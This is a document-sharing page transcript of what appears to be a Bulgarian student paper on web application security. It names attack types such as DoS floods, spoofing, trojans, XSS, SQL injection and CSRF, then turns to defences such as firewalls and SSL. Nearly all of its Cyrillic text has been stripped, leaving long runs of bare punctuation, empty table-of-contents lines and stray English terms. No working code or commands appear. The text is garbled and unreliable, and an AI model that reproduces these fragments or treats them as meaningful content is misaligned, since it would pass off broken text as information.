Безопасност и защита на Web приложения

  • Published on
    26-Jul-2015

  • View
    296

  • Download
    5

Embed Size (px)

Transcript

<p> 1. H H Microsoft H : WEB 2014. : , VI : . - : , 9. . . 400295 2. ...................................................................................................................................................4 .....................................................................................................................................4 Phishing..........................................................................................................................................4 .................................................................................................................4 ............................................................................................................................................5 DoS (Denial of Service attacks)..............................................................................................5 Flood ( Flood Feed / ) . .........................................................................................5 Sniffing ...........................................................................................................................................7 IP Hijack..........................................................................................................................................7 IP Spoofing......................................................................................................................................8 Brute Force .....................................................................................................................................8 Back Orifice (Net Bus, Masters of Paradise .)............................................................................8 Dummy DNS Server.........................................................................................................................8 Dummy ARP Server.........................................................................................................................9 Fuzzy...............................................................................................................................................9 Hack................................................................................................................................................9 Host Spoofing .................................................................................................................................9 Puke................................................................................................................................................9 Port Scan. .......................................................................................................................................9 Syslog Spoofing.............................................................................................................................10 Spam.............................................................................................................................................10 Traffic Analysis (Sniffing)...............................................................................................................10 Trojan Horse. ................................................................................................................................10 Worms..........................................................................................................................................11 File Worms....................................................................................................................................11 Botnet...........................................................................................................................................11 Unreachable (dest_unreach, ICMP type 3). ...................................................................................12 UDP Storm....................................................................................................................................12 3. HRS (HTTP Resource Splitting )......................................................................................................12 Web Cache Poisoning....................................................................................................................12 Browser Cache Poisoning..............................................................................................................12 Malware .......................................................................................................................................13 Keyloggers Screenloggers...........................................................................................................13 Pharming ......................................................................................................................................13 Man-in-the-Middle........................................................................................................................13 Man-in-the-Browser......................................................................................................................13 Spyware........................................................................................................................................14 Buffer Overflow ............................................................................................................................14 Heap Overflow..............................................................................................................................14 Stack Overflow..............................................................................................................................14 Integer Overflow...........................................................................................................................14 Cross Site Scripting (XSS)...............................................................................................................15 alicious file execution ................................................................................................................15 Session Hijacking...........................................................................................................................16 SQL Injection.................................................................................................................................16 Cross-site request forgery (CSRF) ..................................................................................................16 Hidden Fields Manipulation ..........................................................................................................16 .........................................................................................16 ....................................................................................................17 .............................................................................................................18 .............................................................................................................21 .....................................................................................................................................23 ......................................................................................................................24 4. . , , , . Web , , . , . , , . - , , . , (, , , .), , . - , , , . Phishing , , "", , . , , , . , . , , , , . , . ( - , , .) 5. , , , .. . . , - . , , - . , , , . DoS (Denial of Service attacks) , . , , . DS : Floods, ICMP Flooding, Identification Flooding . - DoS : Flood ( Flood Feed / ) . - SYN Flood SYN. , SYN / ACK. , , ; - ICMP Flood Ping Flood ICMP ; - Identification Flood (Ident Flood). ICMP Flood, identd 113 , - . - DNS Flood - DNS . DNS , , . , . - DDoS (DDoS) . - Boink (Bonk, Teardrop) - , . , - , . . 6. - Pong , , , , ; - Smurf - ICMP , . ICMP , . ISP ", . , , -. ICMP -. , ICMP -. , , , WAN ISP . - , - . - Ping of Death - , , (maximum transmission unit MTU) . MTU . , MTU, - (). IP , ICMP , 65535 ( ). , , . - , . - UDP Flood DNS - . . DNS , . - IP . , DNS - , , . - HTTP Flood - , . , HTTP . 7. . DDoS / Botnet, , - . - . , , , HTTP . . - . . . , , w3cache . , . DoS. - Land , , , . ( : : 192.168.0.101, 9006, : 192.168.0.101 9006). , . 100% . - Mail Bombing. , . , , , , . , , DoS. - , . Sniffing . , .. , , . . IP Hijack , . , . , - . 8. IP Spoofing IP () . , IP , . . , . , , . Brute Force , , . . - , - . Back Orifice (Net Bus, Masters of Paradise .). , . , , , 31337, . , . , . Dummy DNS Server. DNS-, DNS- . , . DNS-. 9. Dummy ARP Server. ARP(Address Resolution Protocol) . ARP(Address Resolution Protocol) - , ,(, ), . Fuzzy. IP (TCP, UDP, ICMP) . , . Hack. , , , , Port Scan. - DoS-. Host Spoofing , ICMP, . redirect. redirect . - redirect- . Puke. ICPM unreachable error ( ) , ( IRC). Port Scan. . . () . 10. Syslog Spoofing. , . syslog , . Spam. . ; , ; , Traffic Analysis (Sniffing). . , . , . , . . Trojan Horse. , . , . . , . . . , , . : 1. , . 2. , , FTP . 11. , . - ( 8 ). . 3. ( ) . 4. Key logger - , , "". 5. DDoS (Distributed denial of Service) - . (DDoS) Worms , . , , . , . , . . . File Worms , - , , . . . , . . Botnet e , . 12. Unreachable (dest_unreach, ICMP type 3). , ICMP type 3, , . , , , . UDP Storm. UDP- 7 (echo, ), 19 (Character Generator Protocol (CHARGEN) , ) . UDP-, 7-, 19-, , , ( 127.0.0.1). 19- , 7. 19- . . UDP . HRS (HTTP Resource Splitting ) , HTTP , Web HTTP , . , , , . Web Cache Poisoning , , , , , . , . Browser Cache Poisoning , . Web Cache Poisoning, , . 13. Malware , , , , ( ), . , , , . Keyloggers Screenloggers , . , , , , , . Pharming hosts Domain Name System (DNS) , URL , . , , , , , ., . Man-in-the-Middle . , , , . - , . Man-in-the-Browser , , , . - , , , . . 14. Spyware , . Buffer Overflow . , , , , , , . , , . . Heap Overflow buffer overflow , , Heap. , . , Stack Overflow Stack Overflow( , buffer overflow). heap- Integer Overflow ( signed 16-bit integer -32767 32767.). , , - - . , , , , ( ) . 15. Cross Site Scripting (XSS) , , . - , . HTML, XHTML, JavaScript, ActiveX, VBScript, Flash, . ( session hijacking), (physhing), (virus, worm, trojan, ), . Symantec 80% - XSS . , 70% - . , . XSS - : 1. : . , . , , . - . 2. : . - .. , , , .. 3. DOM: XSS .. . , XSS . alicious file execution . , URL , , URL . , - . , 16. . . Session Hijacking - , , , . , , , . SQL Injection SQL - MySQL, MSSQL . - . , Structured Query Language (SQL) SQL , . . , . , , SQL , , , . Cross-site request forgery (CSRF) , , . , - , , , . Hidden Fields Manipulation . , . , ? 17. 1 . - . 2 ( Microsoft ForeFront Treat Management Gateway). , . , , . , . 3 , - . , , , . 4 - . , . , ( ) . 5 , , SSL . , , , , , , , , . 6 . SSL , . , SSL . , . SSL SSL , , ( ). SSL ( ActiveSync) , . 18. 7 , , . , . , , . 8 . , . , , - . , . , , , , ( ) . , . ,...</p>

Recommended

View more >